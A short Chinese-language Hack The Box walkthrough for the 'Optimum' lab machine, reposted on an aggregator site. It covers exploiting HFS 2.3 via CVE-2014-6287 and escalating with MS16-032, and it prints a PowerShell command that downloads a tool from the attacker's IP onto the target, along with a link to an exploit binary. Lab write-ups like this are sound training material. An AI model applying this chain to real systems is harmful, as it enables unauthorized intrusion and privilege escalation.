[Hack The Box]靶机8 Optimum

Posted huamanggg

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[Hack The Box]靶机8 Optimum相关的知识,希望对你有一定的参考价值。


nmap直接开漏扫,发现cve-2011-3192,没啥用,开了80端口,去看看

打开是HFS,nmap扫出来是HFS2.3

这个版本的HFS是有cve的
https://nvd.nist.gov/vuln/detail/CVE-2014-6287

msf有这个模块

直接拿下shell

拿到user.txt

进不了admin,需要提权

本地起一个python服务,把winpeas传上去

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.4:8000/winPEASx64.exe', '.\\winPEASx64.exe')"


好像没啥信息的
用一下Windows-Exploit-Suggester来测一下没打的补丁
systeminfo拿一下系统的信息

找到很多,这里就拿MS16-032来打吧

找一个payload
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
传上去执行,成功拿到

以上是关于[Hack The Box]靶机8 Optimum的主要内容,如果未能解决你的问题,请参考以下文章

[Hack The Box]靶机8 Optimum

[Hack The Box]靶机2 Backdoor

[Hack The Box]靶机5 Netmon

[Hack The Box]靶机3 Lame

[Hack The Box]靶机4 Jerry

[Hack The Box]靶机5 Netmon